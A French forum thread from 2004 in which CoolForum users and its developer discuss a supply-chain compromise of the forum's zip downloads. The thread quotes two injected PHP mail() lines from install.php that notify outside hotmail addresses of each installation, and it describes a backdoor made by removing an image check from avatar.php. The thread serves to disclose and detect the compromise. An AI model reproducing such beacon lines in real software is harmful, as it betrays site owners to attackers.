Bonjour,

J'ai téléchargé et commencé l'installation de coolforum sur ma machine
Linux.
Comme j'ai toujours mon log postfix sous les yeux, je me suis aperçu que
lors du premier accès à la page de coolforum, 2 mails sont envoyés par
apache aux destinataires bakadono@hotmail.com et myv4you@hotmail.com.

J'aimerai savoir pourquoi ces mails sont envoyés, à qui et surtout,
pourquoi ne pas en avertir l'utilisateur.

Je souhaite vivement que vous puissiez me fournir une explication
rationnelle.

Bonsoir,

L'envoi de ces mails n'est pas normal, et on vient d'en déceler la cause. Cool Coyote est en train de publier une annonce pour vous expliquer en détail

Bonjour,
votre message m'a tout d'abord beaucoup intrigué, dans le doute j'ai quand même vérifié et en effet il se trouve que les fichiers zip des versions 0.6.x et 0.7.x ne correspondaient pas à ce que j'avais.

Il y a deux jours je me suis rendu compte que le hacker qui s'était attaqué au site le week-end dernier avait réussit à garder un backdoor et la date des versions zip correspond à la date où il a sévit en plaçant de nouveau des fichiers suspects sur le serveur... j'ai pourtant tout vérifié et je pensais avoir finalement tout enlevé mais j'avoue que je n'avais pas du tout pensé à vérifier les dates de modifications des zips...

En étudiant les zips voici ce que j'ai découvert:

CERTAINS FICHIERS DU FORUM ONT ETE MODIFIES PAR LE HACKER
CELA CONCERNE ENTRE AUTRE LES FICHIERS D'INSTALLATION QUI ENVOIENT UN MAIL AFIN DE REPERER L'ENDROIT OU LA PERSONNE A INSTALLE LE FORUM. LE FICHIER AVATAR.PHP DU FORUM A ENSUITE ETE MODIFIE AFIN DE LAISSER AU HACKER UNE OUVERTURE POUR S'INTRODUIRE SUR LE COMPTE DE LA VICTIME

SI VOUS AVEZ TELECHARGE LE FORUM ENTRE LE 7 DECEMBRE 2004 ET LE 9 DECEMBRE 2004 VOUS DEVEZ ABSOLUMENT RETELECHARGER LE ZIP ET REMPLACER TOUS VOS FICHIERS AFIN DE DETRUIRE LES FICHIERS HACKES

Je ne peux que m'excuser auprès des utilisateurs du forum de ce désagrément et je vous remercie de m'en avoir fait part si rapidement.

Ok, et bien j'attends cette explication...hmmm...

Ce n'est quand meme pas un hasard, je n'y connais rien en php, pourtant, j'ai mis 2 minutes à trouver 2 lignes dans le fichier install/install.php :

mail("myv4you@hotmail.com", "lol", "lol", "From: webmaster@{$_SERVER['SERVER_NAME']}\r\n"."Reply-To: webmaster@{$_SERVER['SERVER_NAME']}\r\n"."X-Mailer: PHP/".phpversion());

et

mail("bakadono@hotmail.com", "lol", "lol", "From: webmaster@{$_SERVER['SERVER_NAME']}\r\n"."Reply-To: webmaster@{$_SERVER['SERVER_NAME']}\r\n"."X-Mailer: PHP/".phpversion());

Ces deux lignes ne sont pas arrivées là comme ça... serai-ce un reste d'une version de débogage ?

Merci

(edité)
Bon, ben on a la réponse maintenant.
Je pense que le mieux que vous ayez a faire est de prévenir individuellement chaque utilisateur par le biais d'un message de masse, si le forum offre cette possibilité)
Mais excusez moi d'avoir douté, dans un premier temps, de l'intégrité morale des développeurs...


Pouvez vous nous préciser quelles sont les effets, sur un systeme, de l'installation de la version hackée du forum ?
Y a t'il des chances pour que des backdoors puissent etre installées ailleurs que dans le repertoire d'installation du forum ?

Merci


*** Message édité par Utilisateur le 09/12/2004 22:33 ***

Tout d'abord il n'y a pas de soucis quant à votre méfiance, cela m'a paru normal et je suis un peu soulagé quelque part que le problème ait été repéré si vite, car à mon avis vraiment trés peu de personnes ont dû être atteinte.

En ce qui concerne le backdoor, non rien d'autre n'a été modifié, seulement le fichier avatar.php dans lequel le hacker a supprimé le test sur l'image afin de bloquer tout autre fichier suspect.

Les effets sur un systèmes sont nuls à partir du moment où le hacker n'a pas eu le temps d'y accéder, et sont "minimes" pour le serveur cible si ce dernier est bien configuré. Au pire le site est piraté, le serveur lui ne craind rien (ce qui s'est passé la semaine dernière ici)

Par sécurité je vous conseille quand même de supprimer tous les fichiers de cette version et de réinstaller des fichiers sains.

C'est vraiment lamatable de voir ces crétins bouziller des heures de boulot de gents honnetes. J'espere qu'il y aura des poursuites à cette attaque et que ce ***** de pirate va prendre cher.

il n'aura rien et je sais de quoi je parles
avant j'était chez citeheb.net et cet hebergeur au mois de mai et juin ce sont fait pirater le serveur au moins 3 fois par semaine moi mon site à cette époque c'est fait pirater 5 fois et à chaque fois le pirate changer mes fichiers index et en plus mon site etait un phpnke avec ipb comme forum donc vous imaginer le nombre de fichier index qu'il y a dans iun nuke j'ai 5 heures à remettre en place.
cet hébergeur selon leur dires ont porté plainte ce qui est normale et bien le mec cours toujours.je lui ai meme parlé sur msn sans le savoir c'est lui meme qui m'en a parlé.

En fait son but était de savoir le niveau de securité d'un phpnuke. Et comme il avait réussi à piraté mon site 2 semaine plus tard phpnukefrance se faisait pirater de la meme façon que cool si bien qu'ils ont du revoir tous leurs fichier zip de phpnuke.

Moi je hais ce genre de personne qui n'ont aucun scrupule à foutre en l'air le travail d'une personne qui passe des heures voir des mois à faire ce qu'il font.

De toutes façon j'ai refais hier un check de tous les fichiers, j'ai également revérifié les fichiers sensibles du site, j'ai à nouveau rechanger tous mes mots de passe et plus rien de suspect ne tourne sur le serveur.

Cette fois, je pense qu'il peut s'accrocher pour revenir...

heu... checksum md5 ?

Sans rire, ca peut être pratique aussi...

lamentable...
ton hebergeur ne dispose pas des logs des connexions FTP afin d'obtenir les eventuels IP des hackers coolcoyote ?

Salut,

Deja > JE DETESTE LE MOIS DE NOVEMBRE !!!!
2 eme année que je suis a lhopital a ce mois (et j'y suis encore...), ceci dit :

c'est bien beau les log, c'est des chiffres et que des chiffres....

comme dit mon copain, si le gars est pas con, il va ici :
http://www.stayinvisible.com/index.pl/proxy_list

puis voila, tu as l'ip d'un proxy qui change d'ip 2 à 3 fois par jours....

Donc porter plainte est presque inutile pour le retrouver, mais ca te protege au cas ou certaines personnes porteraient plainte contre le webmaster qui sait fait hacké (pour spam ou autre connerie)

Maintenant, il me dit aussi, et ca coyote, tu devrais virer les zip, il y a enormement de faille sur les zip, et winzip (entre autre) essai de minimiser les failles... en gros, fait des tar ou au pire des rar, mais pas de zip...


Enfin, bruno, phpneunuke c'est phpneunuke !!!!
encore l'année dernieres, il y avait des concours "hacker le plus de neunuke en 1 weekend !"
donc, evite ce portail, et surtout les modules bourré de faille.

L'avantage du ZIP, c'est qu'il s'agit du format le plus utilisé...

Si je ne me trompe pas, Windows XP prend en charge le ZIP par défaut mais pas les autres formats... De même, personnellement, lorsque je me connecte de mes cours, je n'ai qu'un décompresseur ZIP installé par défaut... pour décompresser un RAR, il faut aller chercher un décompresseur RAR sur le web, on perd du temps... Sans compter les gens qui laissent tomber dès qu'ils buttent sur un problème quelconque... (ici: ne pas avoir le décompresseur approprié)

Personnellement, je ne suis pas contre diffuser les fichiers en RAR. Mais je pense que c'est une mauvaise idée de supprimer la diffusion au format ZIP. Pk ne pas diffuser le forum sous plusieurs formats différents, comprennant le ZIP ? Ca serait la meilleure solution selon moi.